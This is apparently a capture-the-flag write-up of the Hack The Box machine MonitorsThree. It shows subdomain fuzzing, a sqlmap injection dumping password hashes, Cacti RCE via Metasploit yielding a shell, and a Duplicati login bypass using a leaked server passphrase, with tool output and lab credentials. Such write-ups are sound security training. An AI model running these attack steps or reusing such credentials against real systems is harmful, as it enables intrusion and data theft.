MonitorsThree (htb)
December 21st 2024 | #ctf #hackthebox
Medium machine on hackthebox
bth.eerhtsrotinom@selas Nicola Johnson Glenn Jones
http://monitorsthree.htb/login.php
whatweb http://monitorsthree.htb
http://monitorsthree.htb [200 OK] Bootstrap, Country[RESERVED][ZZ], Email[bth.eerhtsrotinom@selas], HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], IP[10.10.11.30], JQuery, Script, Title[MonitorsThree - Networking Solutions], X-UA-Compatible[IE=edge], nginx[1.18.0]
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/sortedcombined-knock-dnsrecon-fierce-reconng.txt -u http://monitorsthree.htb -H "Host:FUZZ.monitorsthree.htb" -ac
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://monitorsthree.htb
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/sortedcombined-knock-dnsrecon-fierce-reconng.txt
:: Header : Host: FUZZ.monitorsthree.htb
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
cacti [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 34ms]
Cacti changelog shows it is version 1.2.26. The is an exploit for this version: https://github.com/thisisveryfunny/CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26. This is authenticated however.
Metasploit also has modules for cacti exploitation:
0 exploit/linux/http/cacti_unauthenticated_cmd_injection 2022-12-05 excellent Yes Cacti 1.2.22 unauthenticated command injection
exploit/multi/http/cacti_package_import_rce
Need a password first...
sqlmap -r request.sql --dbms=mysql --dbs --level 3
sqlmap -r request.sql --dbms=mysql --dbs -D monitorsthree_db -T users --dump --level 3
https://md5hashing.net/hash/md5/31a181c8372e3afc59dab863430610e8 Password: greencacti2001
Database: monitorsthree_db
Table: users
[4 entries]
+----+------------+-----------------------------+-------------------+-----------+----------------------------------+-----------+-----------------------+------------+
| id | dob | email | name | salary | password | username | position | start_date |
+----+------------+-----------------------------+-------------------+-----------+----------------------------------+-----------+-----------------------+------------+
| 2 | 1978-04-25 | bth.eerhtsrotinom@nimda | Marcus Higgins | 320800.00 | 31a181c8372e3afc59dab863430610e8 | admin | Super User | 2021-01-12 |
| 5 | 1985-02-15 | bth.eerhtsrotinom@nostawm | Michael Watson | 75000.00 | c585d01f2eb3e6e1073e92023088a3dd | mwatson | Website Administrator | 2021-05-10 |
| 6 | 1990-07-30 | bth.eerhtsrotinom@nosrednaj | Jennifer Anderson | 68000.00 | 1e68b6eb86b45f6d92f8f292428f77ac | janderson | Network Engineer | 2021-06-20 |
| 7 | 1982-11-23 | bth.eerhtsrotinom@nospmohtd | David Thompson | 83000.00 | 633b683cc128fe244b00f176c8a950f5 | dthompson | Database Manager | 2022-09-15 |
+----+------------+-----------------------------+-------------------+-----------+----------------------------------+-----------+-----------------------+------------+
/etc/mysql/my.cnf
/etc/mono/mconfig/config.xml
meterpreter > shell
Process 39084 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@monitorsthree:~/html/cacti/resource$
MariaDB [cacti]> select * from user_auth;
select * from user_auth;
+----+----------+--------------------------------------------------------------+-------+---------------+--------------------------+----------------------+-----------------+-----------+-----------+--------------+----------------+------------+---------------+--------------+--------------+------------------------+---------+------------+-----------+------------------+--------+-----------------+----------+-------------+
| id | username | password | realm | full_name | email_address | must_change_password | password_change | show_tree | show_list | show_preview | graph_settings | login_opts | policy_graphs | policy_trees | policy_hosts | policy_graph_templates | enabled | lastchange | lastlogin | password_history | locked | failed_attempts | lastfail | reset_perms |
+----+----------+--------------------------------------------------------------+-------+---------------+--------------------------+----------------------+-----------------+-----------+-----------+--------------+----------------+------------+---------------+--------------+--------------+------------------------+---------+------------+-----------+------------------+--------+-----------------+----------+-------------+
| 1 | admin | $2y$10$tjPSsSP6UovL3OTNeam4Oe24TSRuSRRApmqf5vPinSer3mDuyG90G | 0 | Administrator | bth.eerhtsrotinom@sucram | | | on | on | on | on | 2 | 1 | 1 | 1 | 1 | on | -1 | -1 | -1 | | 0 | 0 | 436423766 |
| 3 | guest | $2y$10$SO8woUvjSFMr1CDo8O3cz.S6uJoqLaTe6/mvIcUuXzKsATo77nLHu | 0 | Guest Account | bth.eerhtsrotinom@tseug | | | on | on | on | | 1 | 1 | 1 | 1 | 1 | | -1 | -1 | -1 | | 0 | 0 | 3774379591 |
| 4 | marcus | $2y$10$Fq8wGXvlM3Le.5LIzmM9weFs9s6W2i1FLg3yrdNGmkIaxo79IBjtK | 0 | Marcus | bth.eerhtsrotinom@sucram | | on | on | on | on | on | 1 | 1 | 1 | 1 | 1 | on | -1 | -1 | | | 0 | 0 | 1677427318 |
+----+----------+--------------------------------------------------------------+-------+---------------+--------------------------+----------------------+-----------------+-----------+-----------+--------------+----------------+------------+---------------+--------------+--------------+------------------------+---------+------------+-----------+------------------+--------+-----------------+----------+-------------+
ssh -i marcus.key -L 8888:localhost:8200 marcus@10.10.11.30
Last login: Sun Jan 12 12:42:45 2025 from 10.10.14.25
marcus@monitorsthree:~$
find / -name "filename" 2>/dev/null
find / -name "duplicati" 2>/dev/null
/opt/duplicati
/etc/cron.d/duplicati
marcus@monitorsthree:/opt/duplicati/config$ ls
control_dir_v2 CTADPNHLTC.sqlite Duplicati-server.sqlite
sqlite3 Duplicati-server.sqlite .dump
PRAGMA foreign_keys=OFF;
BEGIN TRANSACTION;
CREATE TABLE IF NOT EXISTS "Backup" (
"ID" INTEGER PRIMARY KEY AUTOINCREMENT,
"Name" TEXT NOT NULL,
"Description" TEXT NOT NULL DEFAULT '',
"Tags" TEXT NOT NULL,
"TargetURL" TEXT NOT NULL,
"DBPath" TEXT NOT NULL
);
INSERT INTO Backup VALUES(4,'Cacti 1.2.26 Backup','','','file:///source/opt/backups/cacti/','/config/CTADPNHLTC.sqlite');
CREATE TABLE IF NOT EXISTS "Schedule" (
"ID" INTEGER PRIMARY KEY,
"Tags" TEXT NOT NULL,
"Time" INTEGER NOT NULL,
"Repeat" TEXT NOT NULL,
"LastRun" INTEGER NOT NULL,
"Rule" TEXT NOT NULL
);
INSERT INTO Schedule VALUES(1,'ID=4',1736766000,'1D',1736679600,'AllowedWeekDays=Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday');
CREATE TABLE IF NOT EXISTS "Source" (
"BackupID" INTEGER NOT NULL,
"Path" TEXT NOT NULL
);
INSERT INTO Source VALUES(4,'/source/var/www/html/cacti/');
CREATE TABLE IF NOT EXISTS "Filter" (
"BackupID" INTEGER NOT NULL,
"Order" INTEGER NOT NULL,
"Include" INTEGER NOT NULL,
"Expression" TEXT NOT NULL
);
CREATE TABLE IF NOT EXISTS "Option" (
"BackupID" INTEGER NOT NULL,
"Filter" TEXT NOT NULL,
"Name" TEXT NOT NULL,
"Value" TEXT NOT NULL
);
INSERT INTO Option VALUES(4,'','encryption-module','');
INSERT INTO Option VALUES(4,'','compression-module','zip');
INSERT INTO Option VALUES(4,'','dblock-size','50mb');
INSERT INTO Option VALUES(4,'','--no-encryption','true');
INSERT INTO Option VALUES(-1,'','--asynchronous-upload-limit','50');
INSERT INTO Option VALUES(-1,'','--asynchronous-concurrent-upload-limit','50');
INSERT INTO Option VALUES(-2,'','startup-delay','0s');
INSERT INTO Option VALUES(-2,'','max-download-speed','');
INSERT INTO Option VALUES(-2,'','max-upload-speed','');
INSERT INTO Option VALUES(-2,'','thread-priority','');
INSERT INTO Option VALUES(-2,'','last-webserver-port','8200');
INSERT INTO Option VALUES(-2,'','is-first-run','');
INSERT INTO Option VALUES(-2,'','server-port-changed','True');
INSERT INTO Option VALUES(-2,'','server-passphrase','Wb6e855L3sN9LTaCuwPXuautswTIQbekmMAr7BrK2Ho=');
INSERT INTO Option VALUES(-2,'','server-passphrase-salt','xTfykWV1dATpFZvPhClEJLJzYA5A4L74hX7FK8XmY0I=');
INSERT INTO Option VALUES(-2,'','server-passphrase-trayicon','d66ecdd2-2fd6-47e3-9e94-3e2782095738');
INSERT INTO Option VALUES(-2,'','server-passphrase-trayicon-hash','J6r4mKrRMXXX3fvCQ4BOLZMydxAi/Ca/PFbXAAbY25E=');
INSERT INTO Option VALUES(-2,'','last-update-check','638721870349156060');
INSERT INTO Option VALUES(-2,'','update-check-interval','');
INSERT INTO Option VALUES(-2,'','update-check-latest','');
INSERT INTO Option VALUES(-2,'','unacked-error','False');
INSERT INTO Option VALUES(-2,'','unacked-warning','False');
INSERT INTO Option VALUES(-2,'','server-listen-interface','any');
INSERT INTO Option VALUES(-2,'','server-ssl-certificate','');
INSERT INTO Option VALUES(-2,'','has-fixed-invalid-backup-id','True');
INSERT INTO Option VALUES(-2,'','update-channel','');
INSERT INTO Option VALUES(-2,'','usage-reporter-level','');
INSERT INTO Option VALUES(-2,'','has-asked-for-password-protection','true');
INSERT INTO Option VALUES(-2,'','disable-tray-icon-login','false');
INSERT INTO Option VALUES(-2,'','allowed-hostnames','*');
CREATE TABLE IF NOT EXISTS "Metadata" (
"BackupID" INTEGER NOT NULL,
"Name" TEXT NOT NULL,
"Value" TEXT NOT NULL
);
INSERT INTO Metadata VALUES(4,'LastBackupDate','20250112T110000Z');
INSERT INTO Metadata VALUES(4,'BackupListCount','5');
INSERT INTO Metadata VALUES(4,'TotalQuotaSpace','8350261248');
INSERT INTO Metadata VALUES(4,'FreeQuotaSpace','1647616000');
INSERT INTO Metadata VALUES(4,'AssignedQuotaSpace','-1');
INSERT INTO Metadata VALUES(4,'TargetFilesSize','20586964');
INSERT INTO Metadata VALUES(4,'TargetFilesCount','15');
INSERT INTO Metadata VALUES(4,'TargetSizeString','19.63 MB');
INSERT INTO Metadata VALUES(4,'SourceFilesSize','64904965');
INSERT INTO Metadata VALUES(4,'SourceFilesCount','3883');
INSERT INTO Metadata VALUES(4,'SourceSizeString','61.90 MB');
INSERT INTO Metadata VALUES(4,'LastBackupStarted','20250112T110000Z');
INSERT INTO Metadata VALUES(4,'LastBackupFinished','20250112T110005Z');
INSERT INTO Metadata VALUES(4,'LastBackupDuration','00:00:05.6605300');
INSERT INTO Metadata VALUES(4,'LastErrorDate','20240820T111518Z');
INSERT INTO Metadata VALUES(4,'LastErrorMessage','Found 12 remote files that are not recorded in local storage, please run repair');
INSERT INTO Metadata VALUES(4,'LastCompactDuration','00:00:00.0262700');
INSERT INTO Metadata VALUES(4,'LastCompactStarted','20250112T110005Z');
INSERT INTO Metadata VALUES(4,'LastCompactFinished','20250112T110005Z');
CREATE TABLE IF NOT EXISTS "Log" (
"BackupID" INTEGER NOT NULL,
"Description" TEXT NOT NULL,
"Start" INTEGER NOT NULL,
"Finish" INTEGER NOT NULL,
"Result" TEXT NOT NULL,
"SuggestedIcon" TEXT NOT NULL
);
CREATE TABLE IF NOT EXISTS "ErrorLog" (
"BackupID" INTEGER,
"Message" TEXT NOT NULL,
"Exception" TEXT,
"Timestamp" INTEGER NOT NULL
);
INSERT INTO ErrorLog VALUES(-1,'Error in updater',replace('System.Net.WebException: Error: NameResolutionFailure\n at System.Net.WebConnection.Connect (System.Net.WebOperation operation, System.Threading.CancellationToken cancellationToken) [0x00044] in <a8a996a78a804d888710c9e2575d78c8>:0 \n at System.Net.WebConnection.InitConnection (System.Net.WebOperation operation, System.Threading.CancellationToken cancellationToken) [0x000cc] in <a8a996a78a804d888710c9e2575d78c8>:0 \n at System.Net.WebOperation.Run () [0x0009a] in <a8a996a78a804d888710c9e2575d78c8>:0 \n at System.Net.WebCompletionSource`1[T].WaitForCompletion () [0x00094] in <a8a996a78a804d888710c9e2575d78c8>:0 \n at System.Net.HttpWebRequest.RunWithTimeoutWorker[T] (System.Threading.Tasks.Task`1[TResult] workerTask, System.Int32 timeout, System.Action abort, System.Func`1[TResult] aborted, System.Threading.CancellationTokenSource cts) [0x000f8] in <a8a996a78a804d888710c9e2575d78c8>:0 \n at System.Net.HttpWebRequest.GetResponse () [0x00016] in <a8a996a78a804d888710c9e2575d78c8>:0 \n at System.Net.WebClient.GetWebResponse (System.Net.WebRequest request) [0x00000] in <a8a996a78a804d888710c9e2575d78c8>:0 \n at System.Net.WebClient.DownloadBits (System.Net.WebRequest request, System.IO.Stream writeStream) [0x000e6] in <a8a996a78a804d888710c9e2575d78c8>:0 \n at System.Net.WebClient.DownloadFile (System.Uri address, System.String fileName) [0x00088] in <a8a996a78a804d888710c9e2575d78c8>:0 \n at System.Net.WebClient.DownloadFile (System.String address, System.String fileName) [0x00008] in <a8a996a78a804d888710c9e2575d78c8>:0 \n at (wrapper remoting-invoke-with-check) System.Net.WebClient.DownloadFile(string,string)\n at Duplicati.Library.AutoUpdater.UpdaterManager.CheckForUpdate (Duplicati.Library.AutoUpdater.ReleaseType channel) [0x000ee] in <a701dea807af493c8cb16ad2fe09f97c>:0 ','\n',char(10)),1736590243);
INSERT INTO ErrorLog VALUES(-1,'Error in updater',replace('System.Net.WebException: Error: NameResolutionFailure\n at System.Net.WebConnection.Connect (System.Net.WebOperation operation, System.Threading.CancellationToken cancellationToken) [0x00044] in <a8a996a78a804d888710c9e2575d78c8>:0 \n at System.Net.WebConnection.InitConnection (System.Net.WebOperation operation, System.Threading.CancellationToken cancellationToken) [0x000cc] in <a8a996a78a804d888710c9e2575d78c8>:0 \n at System.Net.WebOperation.Run () [0x0009a] in <a8a996a78a804d888710c9e2575d78c8>:0 \n at System.Net.WebCompletionSource`1[T].WaitForCompletion () [0x00094] in <a8a996a78a804d888710c9e2575d78c8>:0 \n at System.Net.HttpWebRequest.RunWithTimeoutWorker[T] (System.Threading.Tasks.Task`1[TResult] workerTask, System.Int32 timeout, System.Action abort, System.Func`1[TResult] aborted, System.Threading.CancellationTokenSource cts) [0x000f8] in <a8a996a78a804d888710c9e2575d78c8>:0 \n at System.Net.HttpWebRequest.GetResponse () [0x00016] in <a8a996a78a804d888710c9e2575d78c8>:0 \n at System.Net.WebClient.GetWebResponse (System.Net.WebRequest request) [0x00000] in <a8a996a78a804d888710c9e2575d78c8>:0 \n at System.Net.WebClient.DownloadBits (System.Net.WebRequest request, System.IO.Stream writeStream) [0x000e6] in <a8a996a78a804d888710c9e2575d78c8>:0 \n at System.Net.WebClient.DownloadFile (System.Uri address, System.String fileName) [0x00088] in <a8a996a78a804d888710c9e2575d78c8>:0 \n at System.Net.WebClient.DownloadFile (System.String address, System.String fileName) [0x00008] in <a8a996a78a804d888710c9e2575d78c8>:0 \n at (wrapper remoting-invoke-with-check) System.Net.WebClient.DownloadFile(string,string)\n at Duplicati.Library.AutoUpdater.UpdaterManager.CheckForUpdate (Duplicati.Library.AutoUpdater.ReleaseType channel) [0x000ee] in <a701dea807af493c8cb16ad2fe09f97c>:0 ','\n',char(10)),1736590251);
CREATE TABLE IF NOT EXISTS "Version" (
"ID" INTEGER PRIMARY KEY,
"Version" INTEGER NOT NULL
);
INSERT INTO Version VALUES(1,6);
CREATE TABLE IF NOT EXISTS "Notification" (
"ID" INTEGER PRIMARY KEY,
"Type" TEXT NOT NULL,
"Title" TEXT NOT NULL,
"Message" TEXT NOT NULL,
"Exception" TEXT NOT NULL,
"BackupID" TEXT NULL,
"Action" TEXT NOT NULL,
"Timestamp" INTEGER NOT NULL,
"LogEntryID" TEXT NULL,
"MessageID" TEXT NULL,
"MessageLogTag" TEXT NULL
);
CREATE TABLE IF NOT EXISTS "UIStorage" (
"Scheme" TEXT NOT NULL,
"Key" TEXT NOT NULL,
"Value" TEXT NOT NULL
);
CREATE TABLE IF NOT EXISTS "TempFile" (
"ID" INTEGER PRIMARY KEY,
"Origin" TEXT NOT NULL,
"Path" TEXT NOT NULL,
"Timestamp" INTEGER NOT NULL,
"Expires" INTEGER NOT NULL
);
DELETE FROM sqlite_sequence;
INSERT INTO sqlite_sequence VALUES('Backup',15);
COMMIT;
https://medium.com/@STarXT/duplicati-bypassing-login-authentication-with-server-passphrase-024d6991e9ee This is also discussed on the Duplicati GitHub: https://github.com/duplicati/duplicati/issues/5197
python3 duplicati-login.py 'Wb6e855L3sN9LTaCuwPXuautswTIQbekmMAr7BrK2Ho=' http://localhost:8888/login.cgi
nonce: f6I/TVqOkPh99AUu6ByUR10GFGcn72u2styqdWGPe2g=
salt: xTfykWV1dATpFZvPhClEJLJzYA5A4L74hX7FK8XmY0I=
hash: Wb6e855L3sN9LTaCuwPXuautswTIQbekmMAr7BrK2Ho=
<Cookie xsrf-token=0EkGO1g%2BF2TCl9wQLBU2ogkBM78EpH1Tdq5AbQa5uTA%3D for localhost.local/>
<Cookie session-nonce=f6I%2FTVqOkPh99AUu6ByUR10GFGcn72u2styqdWGPe2g%3D for localhost.local/>
<Cookie session-auth=X8dwUzo4_h89iqDWUoc_tOOSkAp2dlk-mKS30LswI0o for localhost.local/>
Tutorial for setting up intercept in Burp: https://www.matthewsetter.com/introduction-to-burp-suite/
< letsdefend.io WriteUp - SOC109 - Emotet Malware Detected | Pozos negros y frambuesas – Montando un servidor DNS y bloqueando anuncios a nivel de red con la Raspberry Pi >